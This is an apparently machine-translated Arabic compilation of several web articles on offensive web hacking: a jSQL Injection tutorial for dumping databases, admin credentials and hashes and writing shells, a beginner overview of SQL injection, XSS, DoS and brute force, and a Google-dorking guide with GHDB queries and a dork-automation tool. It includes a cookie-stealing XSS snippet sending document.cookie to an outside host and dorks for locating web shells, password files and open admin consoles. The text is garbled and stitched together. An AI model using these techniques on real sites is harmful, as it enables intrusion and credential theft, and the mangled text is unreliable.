قم بتشغيل الملف الذي تم تنزيله بالنقر المزدوج (يجب أن يكون لديك ملف آلة افتراضية ).
[قسم قيد الإنشاء]
[قسم قيد الإنشاء]
[قسم قيد الإنشاء]
العمل مع البرنامج بسيط للغاية. يكفي إدخال عنوان الموقع والضغط على ENTER.
تُظهر لقطة الشاشة التالية أن الموقع عرضة لثلاثة أنواع من حقن SQL في وقت واحد (يشار إلى المعلومات المتعلقة بهم في الزاوية اليمنى السفلية). من خلال النقر على أسماء الحقن ، يمكنك تبديل الطريقة المستخدمة:
أيضا ، تم بالفعل عرض قواعد البيانات الموجودة.
يمكنك مشاهدة محتويات كل جدول:
عادةً ما يكون الشيء الأكثر إثارة للاهتمام في الجداول هو بيانات اعتماد المسؤول.
إذا كنت محظوظًا ووجدت بيانات المسؤول ، فمن السابق لأوانه الابتهاج. تحتاج أيضًا إلى العثور على لوحة الإدارة ، حيث يتم إدخال هذه البيانات.
للقيام بذلك ، انتقل إلى علامة التبويب التالية. هنا يتم الترحيب بنا من خلال قائمة بالعناوين المحتملة. يمكنك تحديد صفحة واحدة أو عدة صفحات للتحقق منها:
تكمن الراحة في حقيقة أنك لست بحاجة إلى استخدام برامج أخرى.
لسوء الحظ ، لا يوجد الكثير من المبرمجين المهملين الذين يخزنون كلمات المرور بنص واضح. في كثير من الأحيان ، في سطر كلمة المرور ، نرى شيئًا مثل
8743b52063cd84097a65d1633f5c74f5
هذا هو تجزئة. يمكنك فك تشفيرها بالقوة الغاشمة. و ... يحتوي حقن jSQL على قوة غاشمة مدمجة.
الراحة بلا شك هي أنك لست بحاجة للبحث عن برامج أخرى. يدعم العديد من التجزئات الأكثر شيوعًا.
هذا ليس الخيار الأفضل. من أجل أن تصبح خبيرًا في فك رموز التجزئة ، يوصى بالكتاب "" باللغة الروسية.
ولكن ، بالطبع ، عندما لا يكون هناك برنامج آخر في متناول اليد أو لا يوجد وقت للتعلم ، فإن حقن jSQL مع وظيفة القوة الغاشمة المدمجة سيكون مفيدًا.
هناك إعدادات: يمكنك تعيين الأحرف المضمنة في كلمة المرور ، ونطاق طول كلمة المرور.
بالإضافة إلى العمليات مع قواعد البيانات - قراءتها وتعديلها ، في حالة الكشف عن حقن SQL ، يمكن إجراء عمليات الملفات التالية:
وكل هذا يتم تنفيذه في حقن jSQL!
هناك قيود - يجب أن يمتلك خادم SQL امتيازات الملف. مسؤول مسؤولي النظامتم تعطيلهم والوصول إلى نظام الملفاتلن تتمكن من الحصول عليها.
من السهل التحقق من وجود امتيازات الملف. انتقل إلى إحدى علامات التبويب (قراءة الملفات وإنشاء غلاف وتحميل ملف جديد) وحاول تنفيذ إحدى العمليات المحددة.
ملاحظة أخرى مهمة للغاية - نحتاج إلى معرفة المسار المطلق الدقيق للملف الذي سنعمل به - وإلا فلن يعمل شيء.
ألق نظرة على لقطة الشاشة التالية:
يتم الرد على أي محاولة للعمل على ملف من خلال: لا يوجد امتياز FILE(لا توجد امتيازات ملف). ولا يمكن فعل شيء حيال ذلك.
إذا كان لديك خطأ مختلف بدلاً من ذلك:
مشكلة في الكتابة إلى [directory_name]
هذا يعني أنك حددت بشكل غير صحيح المسار المطلق حيث تريد كتابة الملف.
من أجل افتراض مسار مطلق ، عليك أن تعرف على الأقل نظام التشغيلالذي يعمل عليه الخادم. للقيام بذلك ، قم بالتبديل إلى علامة التبويب الشبكة.
مثل هذا الدخول (سطر Win64) يعطينا سببًا لافتراض أننا نتعامل مع نظام تشغيل Windows:
Keep-Alive: timeout = 5، max = 99 الخادم: Apache / 2.4.17 (Win64) PHP / 7.0.0RC6 Connection: Keep-Alive Method: HTTP / 1.1 200 OK Content-Length: 353 Date: Friday، 11 Dec 2015 11:48:31 GMT X-Powered-By: PHP / 7.0.0RC6 نوع المحتوى: text / html؛ محارف = UTF-8
هنا لدينا بعض أنظمة Unix (* BSD ، Linux):
ترميز التحويل: مجزأ التاريخ: الجمعة ، 11 ديسمبر 2015 11:57:02 طريقة جرينتش: HTTP / 1.1 200 لا بأس بها الحفاظ على الحياة: المهلة = 3 ، الحد الأقصى = 100 الاتصال: نوع المحتوى: نص / html X- بدعم من: PHP / 5.3.29 الخادم: Apache / 2.2.31 (Unix)
وهنا لدينا CentOS:
الطريقة: HTTP / 1.1 200 OK تنتهي الصلاحية: الخميس ، 19 نوفمبر 1981 08:52:00 ملف تعريف ارتباط GMT: PHPSESSID = 9p60gtunrv7g41iurr814h9rd0؛ المسار = / الاتصال: X-Cache-Lookup: MISS من t1.hoster.ru:6666 الخادم: Apache / 2.2.15 (CentOS) X-Powered-By: PHP / 5.4.37 X-Cache: MISS from t1.hoster.ru Cache-Control: no-store، no-cache، must-revalidate، post-check = 0، pre-check = 0 Pragma: no-cache Date: Friday، 11 Dec 2015 12:08:54 GMT ترميز النقل: نوع المحتوى المقسم: نص / html ؛ محارف = WINDOWS-1251
في Windows ، المجلد النموذجي للمواقع هو ج: \ الخادم \ البيانات \ htdocs \... ولكن ، في الواقع ، إذا "فكر" شخص ما في إنشاء خادم على Windows ، فعلى الأرجح أن هذا الشخص لم يسمع أي شيء عن الامتيازات. لذلك ، فإن الأمر يستحق أن تبدأ المحاولات مباشرة من دليل C: / Windows /:
كما ترى ، سارت الأمور على ما يرام في المرة الأولى.
لكن قذائف حقن jSQL نفسها تثير شكوكي. إذا كان لديك امتيازات ملف ، فيمكنك بسهولة تحميل شيء ما من واجهة الويب.
وحتى حقن jSQL يحتوي على هذه الميزة. كل شيء بسيط للغاية - قم بتحميل قائمة بالمواقع (يمكنك الاستيراد من ملف) ، حدد تلك التي تريد التحقق منها واضغط على الزر المناسب لبدء العملية.
يعد jSQL Injection أداة جيدة وقوية لإيجاد ثم استخدام حقن SQL الموجودة في المواقع. مزاياها التي لا شك فيها: سهولة الاستخدام ، والوظائف ذات الصلة المضمنة. يمكن أن يكون حقن jSQL أفضل صديق للمبتدئين عند تحليل مواقع الويب.
من بين أوجه القصور ، أود أن أشير إلى استحالة تحرير قواعد البيانات (على الأقل لم أجد هذه الوظيفة). كما هو الحال مع جميع الأدوات ذات الواجهة الرسومية ، يمكن أن تُعزى عيوب هذا البرنامج إلى استحالة استخدامه في البرامج النصية. ومع ذلك ، فإن بعض الأتمتة ممكنة في هذا البرنامج أيضًا - بفضل وظيفة فحص الموقع بالجملة المضمنة.
يعد حقن JSQL أكثر ملاءمة للاستخدام من sqlmap. لكن sqlmap يدعم أنواعًا أكثر من حقن SQL ، ولديه خيارات للعمل مع جدران حماية الملفات وبعض الوظائف الأخرى.
خلاصة القول: jSQL Injection هو أفضل صديق للقراصنة المبتدئين.
يمكنك العثور على مساعدة حول هذا البرنامج في موسوعة Kali Linux على هذه الصفحة: http://kali.tools/؟p=706
قررت التحدث قليلا عن أمن المعلومات... ستكون المقالة مفيدة للمبرمجين المبتدئين وأولئك الذين بدأوا للتو في تطوير الواجهة الأمامية. ما المشكلة؟
كثير من المطورين المبتدئين مدمنون على كتابة التعليمات البرمجية لدرجة أنهم ينسون تمامًا سلامة عملهم. والأهم من ذلك أنهم نسوا نقاط الضعف مثل استعلام SQL ، XXS. كما أنهم يأتون بكلمات مرور خفيفة للوحات الإدارة الخاصة بهم ويتعرضون للقوة الغاشمة. ما هي هذه الهجمات وكيف يمكن تجنبها؟
يعد حقن SQL هو النوع الأكثر شيوعًا من هجمات قاعدة البيانات التي يتم تنفيذها باستخدام استعلام SQL لنظام DBMS محدد. كثير من الناس وحتى الشركات الكبيرة يعانون من مثل هذه الهجمات. السبب هو خطأ المطور عند كتابة قاعدة بيانات ، وفي الواقع ، استعلامات SQL.
هجوم حقن SQL ممكن بسبب المعالجة غير الصحيحة لبيانات الإدخال المستخدمة في استعلامات SQL. إذا أكمل أحد المتطفلين هجومًا بنجاح ، فإنك تخاطر بفقدان ليس فقط محتويات قواعد البيانات ، ولكن أيضًا كلمات المرور وسجلات لوحة الإدارة ، على التوالي. وستكون هذه البيانات كافية تمامًا للسيطرة على الموقع بالكامل أو إجراء تعديلات لا رجعة فيها عليه.
يمكن إعادة إنتاج الهجوم بنجاح في نصوص مكتوبة بلغات PHP و ASP و Perl ولغات أخرى. يعتمد نجاح مثل هذه الهجمات بشكل أكبر على نظام إدارة قواعد البيانات (DBMS) المستخدم وكيفية تنفيذ البرنامج النصي نفسه. هناك الكثير من مواقع حقن SQL المعرضة للخطر في العالم. من السهل التحقق من هذا. يكفي إدخال كلمة "dorks" - هذه طلبات خاصة للبحث عن المواقع المعرضة للخطر. هنا بعض منهم:
كيف يتم استخدامها؟ يكفي إدخالها في محرك بحث Google أو Yandex. لن يمنحك محرك البحث موقعًا ضعيفًا فحسب ، بل يمنحك أيضًا صفحة لهذه الثغرة الأمنية. لكننا لن نتطرق إلى هذا الأمر ونتأكد من أن الصفحة معرضة للخطر حقًا. للقيام بذلك ، يكفي وضع علامة اقتباس واحدة "" بعد القيمة "id = 1". شيء من هذا القبيل:
وسيقدم لنا الموقع خطأ حول استعلام SQL. ما الذي يحتاجه المخترق بعد ذلك؟
وبعد ذلك يحتاج هذا الرابط إلى صفحة الخطأ. ثم يتم العمل على الثغرة الأمنية في معظم الحالات في توزيع "Kali linux" مع أدواته المساعدة لهذا الجزء: حقن كود الحقن وتنفيذ العمليات اللازمة. كيف سيحدث هذا ، لا أستطيع أن أخبرك. لكن يمكنك العثور على معلومات حول هذا على الإنترنت.
يتم تنفيذ هذا النوع من الهجوم على بسكويت... المستخدمون بدورهم مغرمون جدًا بإنقاذهم. لما لا؟ كيف يمكن أن يكون بدونهم؟ في الواقع ، بفضل ملفات تعريف الارتباط ، لا نستخدم كلمة مرور من Vk.com أو Mail.ru مئات المرات. وقليل ممن يرفضونهم. ولكن على الإنترنت ، غالبًا ما تظهر قاعدة للقراصنة: عامل الراحة يتناسب طرديًا مع عامل عدم الأمان.
لتنفيذ هجوم XSS ، يحتاج المخترق لدينا إلى معرفة JavaScript. للوهلة الأولى ، تكون اللغة بسيطة للغاية وغير ضارة ، لأنها لا تستطيع الوصول إلى موارد الكمبيوتر. يمكن للمخترق العمل مع JavaScript في متصفح فقط ، لكن هذا يكفي. بعد كل شيء ، الشيء الرئيسي هو إدخال الرمز في صفحة الويب.
لن أتحدث بالتفصيل عن عملية الهجوم. سأخبرك فقط بالأساسيات ومعنى كيفية حدوث ذلك.
يمكن للمتسلل إضافة كود JS إلى منتدى أو سجل زوار:
ستعيد البرامج النصية توجيهنا إلى الصفحة المصابة ، حيث سيتم تنفيذ الكود: سواء أكان ذلك متتبعًا أو نوعًا من التخزين أو استغلالًا من شأنه أن يسرق ملفات تعريف الارتباط الخاصة بنا بطريقة ما من ذاكرة التخزين المؤقت.
لماذا JavaScript؟ لأن JavaScript يتوافق جيدًا مع طلبات الويب ولديه حق الوصول إلى ملفات تعريف الارتباط. ولكن إذا كان البرنامج النصي الخاص بنا سينقلنا إلى موقع ما ، فسوف يلاحظه المستخدم بسهولة. هنا ، يستخدم المخترق خيارًا أكثر ذكاءً - يقوم ببساطة بإدخال الكود في الصورة.
Img = صورة جديدة () ؛
Img.src = ”http://192.168.1.7/sniff.php؟32+document.cookie ؛
نقوم فقط بإنشاء صورة وتعيين البرنامج النصي الخاص بنا كعنوان لها.
كيف تحمي نفسك من كل هذا؟ بسيط جدًا - لا تضغط على الروابط المشبوهة.
DoS (من الإنكار الإنجليزي للخدمة - الحرمان من الخدمة) - هجوم القراصنةإلى نظام الكمبيوتر من أجل إخفاقه. هذا هو خلق مثل هذه الظروف التي بموجبها لا يمكن للمستخدمين الضميريين للنظام الوصول إلى موارد النظام المقدمة (الخوادم) ، أو يكون هذا الوصول صعبًا. يمكن أن يكون فشل النظام أيضًا خطوة نحو التقاطه ، إذا قدم البرنامج ، في حالة الطوارئ ، أي معلومات مهمة: على سبيل المثال ، إصدار ، جزء كود البرنامجوما إلى ذلك ، ولكن في أغلب الأحيان يكون هذا مقياسًا للضغط الاقتصادي: فقدان خدمة بسيطة تولد الدخل. أصابت الفواتير من المزود أو الإجراءات لتجنب الهجوم الهدف بشكل كبير. حاليًا ، هجمات DoS و DDoS هي الأكثر شيوعًا ، لأنها تسمح تقريبًا لأي نظام بالفشل دون ترك أدلة مهمة من الناحية القانونية.
ما الفرق بين هجمات DoS و DDos؟
DoS هو هجوم مصمم بذكاء. على سبيل المثال ، إذا لم يتحقق الخادم من صحة الحزم الواردة ، فيمكن للمتسلل تقديم مثل هذا الطلب ، والذي ستتم معالجته إلى الأبد ، ولن يكون هناك وقت كافٍ للمعالج للعمل مع الاتصالات الأخرى. وفقًا لذلك ، سيحصل العملاء على رفض الخدمة. لكنها لن تعمل على زيادة التحميل أو تعطيل المواقع الكبيرة المعروفة بهذه الطريقة. إنهم مسلحون بقنوات واسعة إلى حد ما وخوادم فائقة القوة يمكنها التعامل مع مثل هذا التحميل الزائد دون أي مشاكل.
DDoS هو في الواقع نفس هجوم DoS. ولكن إذا كانت هناك حزمة طلب واحدة في DoS ، فيمكن أن يكون هناك المئات أو أكثر منها في DDoS. حتى الخوادم فائقة القوة قد لا تكون قادرة على التعامل مع هذا التحميل الزائد. اسمحوا لي أن أقدم لكم مثالا.
هجوم DoS هو عندما تجري محادثة مع شخص ما ، ولكن بعد ذلك يأتي شخص سيئ السلوك ويبدأ في الصراخ بصوت عالٍ. في الوقت نفسه ، من المستحيل أو من الصعب جدًا التحدث. الحل: اتصل بالأمن ، والذي سيهدأ ويخرج الشخص من الغرفة. تحدث هجمات DDoS عندما يندفع حشد من الآلاف إلى هؤلاء الأشخاص السيئين. في هذه الحالة ، لن يتمكن الحراس من الالتواء وأخذ الجميع بعيدًا.
يتم إنتاج DoS و DDoS من أجهزة كمبيوتر تسمى الزومبي. هذه هي أجهزة الكمبيوتر للمستخدمين الذين اخترقهم المتسللون ، والذين لا يشكون حتى في أن أجهزتهم متورطة في هجوم على خادم.
كيف تحمي نفسك من هذا؟ بشكل عام ، لا شيء. لكن من الممكن تعقيد المهمة بالنسبة للمتسلل. للقيام بذلك ، تحتاج إلى اختيار استضافة جيدة بخوادم قوية.
يمكن للمطور أن يبتكر الكثير من أنظمة الحماية ضد الهجمات ، والاطلاع بشكل كامل على البرامج النصية التي كتبناها ، والتحقق من الموقع بحثًا عن نقاط الضعف ، وما إلى ذلك. ولكن عندما يتعلق الأمر بالخطوة الأخيرة في تخطيط الموقع ، أي عندما يكون من السهل وضع كلمة مرور على لوحة الإدارة ، فقد ينسى شيئًا واحدًا. كلمه السر!
لا يوصى بشدة بتعيين كلمة مرور بسيطة. يمكن أن يكون 12345 ، 1114457 ، vasya111 ، إلخ. لا يوصى بتعيين كلمات مرور أقل من 10-11 حرفًا. خلاف ذلك ، يمكن أن تخضع للهجوم الأكثر شيوعًا وغير الصعب - القوة الغاشمة.
القوة الغاشمة هي هجوم باستخدام القوة الغاشمة باستخدام كلمة المرور برامج خاصة... يمكن أن تكون القواميس مختلفة: اللاتينية ، التعداد بالأرقام ، قل حتى نطاق معين ، مختلط (لاتيني + أرقام) ، وهناك قواميس برموز فريدة @ # 4 $٪ & * ~~ "" \؟ إلخ.
بالطبع ، يمكن تجنب هذا النوع من الهجوم بسهولة عن طريق إنشاء كلمة مرور معقدة. حتى كلمة التحقق يمكن أن تنقذك. وأيضًا ، إذا تم إنشاء موقعك باستخدام CMS ، فسيحسب الكثير منهم هذا النوع من الهجوم ويحظر IP. يجب أن تتذكر دائمًا أنه كلما زاد عدد الأحرف المختلفة الموجودة في كلمة المرور ، زاد صعوبة العثور عليها.
كيف يعمل الهاكرز؟ في معظم الحالات ، إما يشتبهون أو يعرفون جزءًا من كلمة المرور مسبقًا. من المنطقي تمامًا افتراض أن كلمة مرور المستخدم لن تتكون بالتأكيد من 3 أو 5 أحرف. تؤدي كلمات المرور هذه إلى عمليات اختراق متكررة. في الأساس ، يأخذ المتسللون نطاقًا من 5 إلى 10 أحرف ويضيفون بعض الأحرف هناك ، والتي ربما يعرفونها مسبقًا. بعد ذلك ، يتم إنشاء كلمات المرور بالنطاقات المطلوبة. حتى أن هناك برامج لمثل هذه الحالات في توزيع Kali linux. وفويلا ، لن يستمر الهجوم طويلاً ، لأن حجم القاموس لم يعد كبيرًا جدًا. بالإضافة إلى ذلك ، يمكن للمتسلل استخدام قوة بطاقة الفيديو. يدعم بعضها نظام CUDA ، بينما تزداد سرعة البحث بما يصل إلى 10 أضعاف. وهكذا نرى أن الهجوم كذلك بطريقة بسيطةهو حقيقي تماما. لكن ليست المواقع فقط هي التي تخضع للقوة الغاشمة.
أعزائي المطورين ، لا تنسوا أبدًا نظام أمن المعلومات ، لأن الكثير من الناس اليوم ، بما في ذلك الدول ، يعانون من مثل هذه الأنواع من الهجمات. بعد كل شيء ، فإن أكبر نقطة ضعف هي الشخص الذي يمكن دائمًا تشتيت انتباهه في مكان ما أو في مكان ما لا يتم تجاهله. نحن مبرمجون ، لكننا لسنا آلات مبرمجة. كن دائما في حالة تأهب ، لأن فقدان المعلومات ينذر بعواقب وخيمة!
يبدأ أي بحث عن الثغرات الأمنية في موارد الويب بجمع المعلومات الاستخباراتية.
يمكن أن يكون الذكاء إما نشطًا - يفرض على الملفات والأدلة الخاصة بالموقع القوة الغاشمة ، وإطلاق ماسحات الثغرات الأمنية ، وتصفح الموقع يدويًا ، والسلبي - البحث عن المعلومات في محركات البحث المختلفة. يحدث أحيانًا أن تصبح إحدى الثغرات الأمنية معروفة حتى قبل فتح الصفحة الأولى من الموقع.
كيف يكون هذا ممكنا؟
روبوتات البحث ، والتجوال بدون توقف على الإنترنت ، بالإضافة إلى معلومات مفيدة مستخدم عادي، غالبًا ما يصلح ما يمكن أن يستخدمه مجرمو الإنترنت في هجوم على مورد ويب. على سبيل المثال ، أخطاء البرنامج النصي والملفات التي تحتوي على معلومات حساسة (من ملفات التكوين والسجلات إلى الملفات التي تحتوي على بيانات المصادقة والنسخ الاحتياطية لقاعدة البيانات).
من وجهة نظر روبوت البحث ، فإن رسالة الخطأ حول تنفيذ استعلام SQL هي نص عادي ، لا ينفصل ، على سبيل المثال ، عن وصف المنتجات على الصفحة. إذا فجأة روبوت البحثعثرت على ملف بامتداد .sql ، والذي انتهى به الأمر لسبب ما مجلد العملالموقع ، فسيتم اعتباره جزءًا من محتوى الموقع وسيتم فهرسته أيضًا (بما في ذلك ، ربما ، كلمات المرور المحددة فيه).
يمكن العثور على هذه المعلومات من خلال معرفة كلمات رئيسية قوية ، وفريدة من نوعها في كثير من الأحيان ، تساعد في فصل "الصفحات المعرضة للخطر" عن الصفحات التي لا تحتوي على ثغرات أمنية.
توجد قاعدة بيانات ضخمة من الاستعلامات الخاصة باستخدام الكلمات الرئيسية (تسمى dorks) على موقع استغلال db.com وتُعرف باسم قاعدة بيانات Google Hack.
لماذا جوجل؟
يتم استهداف Google بشكل أساسي لسببين:
- الصيغة الأكثر مرونة للكلمات الرئيسية (كما هو موضح في الجدول 1) والأحرف الخاصة (كما هو موضح في الجدول 2) ؛
- لا يزال فهرس google أكثر اكتمالاً من فهرس محركات البحث الأخرى ؛
الجدول 1 - الكلمات الرئيسية الرئيسية في google
الكلمة الرئيسية |
المعنى |
مثال |
موقع |
ابحث فقط في الموقع المحدد. يأخذ في الاعتبار عنوان url فقط |
site: somesite.ru - سيتم العثور على جميع الصفحات الخاصة بالمجال والمجالات الفرعية المحددة |
inurl |
البحث عن طريق الكلمات الموجودة في uri. على عكس cl. الكلمات "موقع" ، للبحث عن التطابقات بعد اسم الموقع |
inurl: أخبار - ابحث عن جميع الصفحات التي توجد بها الكلمة المعطاة في uri |
في النص |
ابحث في نص الصفحة |
intext: "المقابس" - مماثلة تمامًا لطلب البحث المعتاد "المقابس" |
intitle |
ابحث في عنوان الصفحة. نص محاط بين العلامات |
intitle: "index of" - سيجد كل الصفحات مع قائمة الدليل |
تحويلة |
ابحث عن الصفحات ذات الامتداد المحدد |
ext: pdf - البحث عن جميع ملفات pdf |
نوع الملف |
حاليًا ، هو مشابه تمامًا لـ cl. كلمة "تحويلة" |
نوع الملف: pdf - مشابه |
ذات صلة |
ابحث عن مواقع ذات مواضيع مماثلة |
ذات الصلة: google.ru - ستظهر نظائرها |
حلقة الوصل |
ابحث عن المواقع التي ترتبط بهذا |
الرابط: somesite.ru - سوف تجد جميع المواقع التي لها ارتباط بهذا |
حدد |
إظهار تعريف الكلمة |
التعريف: 0 يوم - تعريف المصطلح |
مخبأ |
إظهار محتوى الصفحة في ذاكرة التخزين المؤقت (إن وجدت) |
cache: google.com - سيفتح الصفحة من ذاكرة التخزين المؤقت |
الجدول 2 - رموز خاصة لاستعلامات google
رمز |
المعنى |
مثال |
“ |
العبارة بالضبط |
intitle: "صفحة تكوين جهاز التوجيه RouterOS" - ابحث عن أجهزة التوجيه |
* |
أي نص |
inurl: "bitrix * mcart" - ابحث عن مواقع على bitrix باستخدام وحدة mcart ضعيفة |
. |
أي شخصية |
Index.of - مشابه لطلب فهرس |
- |
استبعاد كلمة |
تحذير من الخطأ - إظهار كل الصفحات التي بها خطأ ولكن بدون تحذير |
.. |
نطاق |
cve 2006..2016 - إظهار نقاط الضعف حسب السنة منذ عام 2006 |
| |
منطقي "أو" |
لينكس | النوافذ - إظهار الصفحات التي تظهر فيها الكلمة الأولى أو الثانية |
يتم تقسيم جميع dorks قاعدة بيانات Google Hack منطقيًا إلى 14 فئة ويتم تقديمها في الجدول 3.
الجدول 3 - فئات قاعدة بيانات Google Hack
فئة |
ما الذي يسمح لك أن تجد |
مثال |
موطئ قدم |
قذائف الويب ومديري الملفات العامة |
ابحث عن جميع المواقع التي تم الاستيلاء عليها حيث تم تحميل قذائف الويب المدرجة: (intitle: “phpshell” OR intitle: “c99shell” OR intitle: “r57shell” OR intitle: “PHP Shell” OR intitle: “phpRemoteView”) “rwx`“ uname ” |
الملفات التي تحتوي على أسماء المستخدمين |
ملفات التسجيل وملفات التكوين والسجلات والملفات التي تحتوي على تاريخ الأوامر التي تم إدخالها |
ابحث عن جميع ملفات التسجيل التي تحتوي على معلومات الحساب: نوع الملف: reg reg + intext: "مدير حساب الإنترنت" |
الدلائل الحساسة |
الدلائل التي تحتوي على معلومات متنوعة (المستندات الشخصية ، تكوينات vpn ، المستودعات المخفية ، إلخ.) |
ابحث عن كافة قوائم الدلائل التي تحتوي على ملفات متعلقة بـ vpn: "تكوين" intitle: "فهرس" intext: vpn المواقع التي تحتوي على مستودعات git: (intext: "index of /.git") ("الدليل الرئيسي") |
كشف خادم الويب |
الإصدار ومعلومات أخرى حول خادم الويب |
ابحث عن وحدات التحكم الإدارية لخادم JBoss: inurl: "/ web-console /" intitle: "وحدة التحكم الإدارية" |
الملفات المعرضة للخطر |
البرامج النصية التي تحتوي على نقاط ضعف معروفة |
ابحث عن المواقع التي تستخدم برنامجًا نصيًا يسمح لك بتنزيل ملف عشوائي من الخادم: allinurl: forcedownload.php؟ file = |
الخوادم المعرضة للخطر |
نصوص التثبيت ، وقذائف الويب ، ووحدات التحكم الإدارية المفتوحة ، وما إلى ذلك. |
ابحث عن وحدات تحكم PHPMyAdmin المفتوحة التي تعمل كجذر: intitle: phpMyAdmin "مرحبًا بك في phpMyAdmin ***" "يعمل على * as root @ *" |
رسائل خاطئة |
غالبًا ما تكشف الأخطاء والتحذيرات المختلفة معلومات مهمة- من إصدار CMS إلى كلمات المرور |
المواقع التي بها أخطاء في تنفيذ استعلامات sql لقاعدة البيانات: "تحذير: mysql_query ()" "استعلام غير صالح" |
الملفات التي تحتوي على معلومات العصير |
الشهادات والنسخ الاحتياطية ورسائل البريد الإلكتروني والسجلات ونصوص SQL وما إلى ذلك. |
البحث عن البرامج النصية للتهيئة SQL: نوع الملف: sql و "insert into" -site: github.com |
الملفات التي تحتوي على كلمات مرور |
كل ما يمكن أن يحتوي على كلمات مرور - سجلات ونصوص SQL وما إلى ذلك. |
السجلات التي تشير إلى كلمات المرور: نوع الملف:سجلفي النص:كلمة السر |تمرير |pw نصوص SQL التي تحتوي على كلمات مرور: تحويلة:sqlفي النص:اسم االمستخدمفي النص:كلمه السر |
معلومات حساسة للتسوق عبر الإنترنت |
المعلومات المتعلقة بالتسوق عبر الإنترنت |
البحث عن الرموز السرية: دسيد =مليار =دبوسكود = |
بيانات الشبكة أو نقاط الضعف |
المعلومات التي لا تتعلق مباشرة بمصدر الويب ، ولكنها تؤثر على الشبكة أو الخدمات الأخرى بخلاف الويب |
البحث عن البرامج النصية ضبط تلقائيالوكلاء الذين يحتويون على معلومات حول الشبكة الداخلية: inurl: الوكيل | inurl: wpad ext: pac | تحويلة: dat findproxyforurl |
الصفحات التي تحتوي على بوابات الدخول |
الصفحات التي تحتوي على نماذج تسجيل الدخول |
صفحات ويب Saplogon: intext: "2016 SAP AG. كل الحقوق محفوظة. " intitle: "تسجيل الدخول" |
أجهزة مختلفة عبر الإنترنت |
الطابعات وأجهزة التوجيه وأنظمة المراقبة وما إلى ذلك. |
ابحث عن لوحة تكوين الطابعة: intitle: "حصانليزر جيت "inurl:مباحث أمن الدولة /المؤلف /يضع_التكوينمعلومات الجهاز.هتم |
التحذيرات ونقاط الضعف |
مواقع الويب على إصدارات CMS المعرضة للخطر |
ابحث عن المكونات الإضافية الضعيفة التي يمكنك من خلالها تحميل ملف عشوائي إلى الخادم: inurl: fckeditor -intext: "ConfigIsEnabled = False" intext: ConfigIsEnabled |
أتمتة البحث عن الثغرات الأمنية
لذلك وُلدت الفكرة لكتابة أداة مساعدة بسيطة تعمل على أتمتة البحث عن الثغرات الأمنية باستخدام محرك بحث (google) وتعتمد على قاعدة بيانات Google Hack.
الأداة المساعدة هي نص مكتوب في nodejs باستخدام phantomjs. على وجه الدقة ، يتم تفسير النص من قبل phantomjs نفسه.
Phantomjs هو متصفح ويب كامل بدون واجهة المستخدم الرسومية ، مدفوعًا برمز js وواجهة برمجة تطبيقات سهلة الاستخدام.
حصلت الأداة على اسم مفهوم تمامًا - dorks. عن طريق تشغيله سطر الأوامر(بدون خيارات) نحصل على مساعدة قصيرة مع العديد من أمثلة الاستخدام:
الشكل 1 - قائمة خيارات dorks الأساسية
الصيغة العامة للأداة هي dork "أمر" "قائمة الخيارات".
ويرد وصف مفصل لجميع الخيارات في الجدول 4.
الجدول 4 - بناء الجملة dorks
أمر |
خيار |
وصف |
غدب |
-ل |
عرض قائمة ذات تعداد رقمي لفئات Google Hack Database dork |
-c "رقم أو اسم الفئة" |
تحميل dorks الفئة المحددةحسب الرقم أو الاسم |
|
-q "عبارة" |
تنزيل dorks وجدت عند الطلب |
|
-o "ملف" |
حفظ النتيجة في ملف (فقط مع خيارات -c | -q) |
|
متصفح الجوجل |
-د الأحمق |
قم بتعيين dork التعسفي (يمكن استخدام هذا الخيار عدة مرات ، ويمكن دمجه مع الخيار -D) |
-D "ملف" |
استخدم dorks من الملف |
|
-s "موقع" |
تعيين الموقع (يمكن استخدام هذا الخيار عدة مرات ، ويمكن دمجه مع خيار -S) |
|
-S "ملف" |
استخدام مواقع من ملف (سيتم تنفيذ dorks القوة الغاشمة لكل موقع على حدة) |
|
-f "مرشح" |
تعيين كلمات رئيسية إضافية (سيتم إضافتها إلى كل dork) |
|
-t "عدد مللي ثانية" |
الفاصل الزمني بين الطلبات إلى google |
|
-T "عدد مللي ثانية" |
مهلة إذا تمت مصادفة رمز التحقق |
|
-o "ملف" |
احفظ النتيجة في ملف (سيتم حفظ تلك المسارات التي تم العثور على شيء لها فقط) |
تظهر قائمة الفئات المتاحة حاليًا في الشكل 2.
الشكل 2 - قائمة فئات dork المتاحة GHDB
سيستبدل الأمر google كل dork في محرك بحث google ويحلل نتيجة التطابقات. الطرق التي تم العثور على شيء ما على طولها سيتم حفظها في ملف.
الأداة تدعم أوضاع البحث المختلفة:
1 dork و 1 موقع ؛
1 dork والعديد من المواقع ؛
موقع واحد والعديد من الحمقى ؛
العديد من المواقع والعديد من الحمقى ؛
يمكن تحديد قائمة dorks والمواقع إما من خلال وسيطة أو من خلال ملف.
مظاهرة العمل
دعنا نحاول البحث عن أي ثغرات باستخدام مثال البحث عن رسائل الخطأ. بواسطة الأمر: dorks ghdb –c 7 –o errors.dorks سيتم تحميل جميع dorks المعروفة من فئة "رسائل الخطأ" كما هو موضح في الشكل 3.
الشكل 3 - تحميل جميع الحمقى المعروفين من فئة "رسائل الخطأ"
يتم تحميل المسارات وحفظها في ملف. الآن يبقى "تحريضهم" على بعض المواقع (انظر الشكل 4).
الشكل 4 - البحث عن نقاط الضعف في موقع الاهتمام في ذاكرة التخزين المؤقت لجوجل
بعد مرور بعض الوقت ، تم العثور على عدة صفحات تحتوي على أخطاء في الموقع المدروس (انظر الشكل 5).
الشكل 5 - تم العثور على رسائل الخطأ
نتيجة لذلك ، نحصل على ملف result.txt القائمة الكاملة dorks ، مما يؤدي إلى ظهور خطأ.
يوضح الشكل 6 نتيجة البحث عن أخطاء الموقع.
الشكل 6 - نتيجة البحث عن الخطأ
يتم عرض backtrace كامل في ذاكرة التخزين المؤقت لهذا الأحمق ، مما يكشف عن المسارات المطلقة للنصوص ونظام إدارة محتوى الموقع ونوع قاعدة البيانات (انظر الشكل 7).
الشكل 7 - إفشاء المعلومات حول جهاز الموقع
ومع ذلك ، يجب ألا يغيب عن البال أنه ليس كل الأحمق من GHDB يعطي نتيجة حقيقية. أيضًا ، قد لا تجد google تطابقًا تامًا وتظهر نتيجة مماثلة.
في هذه الحالة ، من الحكمة استخدام قائمة الأحمق الشخصية الخاصة بك. على سبيل المثال ، يجب أن تبحث دائمًا عن الملفات ذات الامتدادات "غير العادية" ، والتي تظهر أمثلة منها في الشكل 8.
الشكل 8 - قائمة بامتدادات الملفات غير المعتادة لمورد ويب عادي
